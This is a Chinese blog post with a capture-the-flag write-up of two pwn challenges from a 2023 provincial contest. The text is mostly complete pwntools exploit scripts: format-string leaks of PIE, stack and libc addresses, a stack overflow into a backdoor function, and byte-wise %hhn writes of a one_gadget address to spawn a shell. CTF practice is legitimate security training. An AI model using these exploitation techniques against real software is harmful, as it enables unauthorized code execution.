(・ω・)

large picture of the cover

2023陕西省赛pwn(初赛)

tour

from pwn import *
from LibcSearcher import*
context(os='linux', arch='amd64', log_level='debug') 
p = process('./pwn')
#p = remote('60.204.130.55', 10001)
elf = ELF('./pwn')
#libc = ELF('./libc.so.6')


p.sendafter('Your choice :\n','2')

payload1='%11$p,'
gdb.attach(p)
p.sendafter('Welcome to Terra_Cotta_Warriors\n',payload1)
pie_base=int(p.recvuntil(',',drop=True),16)-0x13a0
win=pie_base+0x129a

p.sendafter('Your choice :\n','1')
payload2=b'a'*0x28+p64(win)
p.sendafter('Welcome to Huashan_Mountain\n',payload2)

p.interactive()

格式化字符串泄露pie,然后栈溢出改到后门。

easy_printf

格式化字符串,其他也没什么说的

from pwn import *
from LibcSearcher import*
context(os='linux', arch='amd64', log_level='debug') 
p = process('./pwn')
#p = remote('60.204.130.55', 10001)
elf = ELF('./pwn')
#libc = ELF('./libc.so.6')
#gdb.attach(p)

p.sendafter('Do you know who the best pwner is?\n',b'TokameinE_is_the_best_pwner\x00')

payload1='%1$p,%8$p,%29$p,'

p.sendafter('What do you want to say?\n',payload1)

bss=int(p.recvuntil(',',drop=True),16)
print('bss=',hex(bss))
pie_base=bss-0x4060
print('pie_base=',hex(pie_base))
stack=int(p.recvuntil(',',drop=True),16)
print('stack=',hex(stack))
libc_base=int(p.recvuntil(',',drop=True),16)-0x20840
print('libc_base=',hex(libc_base))

#one_gadget=0xf1247

a=(stack+0x98)&0xff
b=(libc_base+0xf1247)&0xff
print(hex(a))
print(hex(b))
payload2 ='%{}c%8$hhn\x00'.format(a).encode()
p.sendafter('What do you want to say?\n',payload2)
payload3='%{}c%10$hhn\x00'.format(b).encode()
p.sendafter('What do you want to say?\n',payload3)


b=((libc_base+0xf1247)>>8)&0xff
print(hex(b))
payload4 ='%{}c%8$hhn\x00'.format(a+1).encode()
p.sendafter('What do you want to say?\n',payload4)
payload5='%{}c%10$hhn\x00'.format(b).encode()
p.sendafter('What do you want to say?\n',payload5)

b=((libc_base+0xf1247)>>16)&0xff
print(hex(b))
payload4 ='%{}c%8$hhn\x00'.format(a+2).encode()
p.sendafter('What do you want to say?\n',payload4)
payload5='%{}c%10$hhn\x00'.format(b).encode()
p.sendafter('What do you want to say?\n',payload5)


a=(stack+0x90)&0xffff
print(hex(a))
payload6='%{}c%8$hn\x00'.format(a).encode()
p.sendafter('What do you want to say?\n',payload6)

for i in range(4):
	p.sendafter('What do you want to say?\n',b'shell\x00')
gdb.attach(p)
p.sendafter('What do you want to say?\n','alice')
p.interactive()

一开始用的本机2.35版本的libc,栈环境有一点点不一样,exp烦了点。

最后发现因为2.35的onegadget限制有点多,就patch成比赛环境的libc了。

复现一下以前不会的赛题

结果随便一翻就是重量级(一眼出的那种

浇浇我,我什么都会做的

site logo

眠る......

© 2025 (・ω・)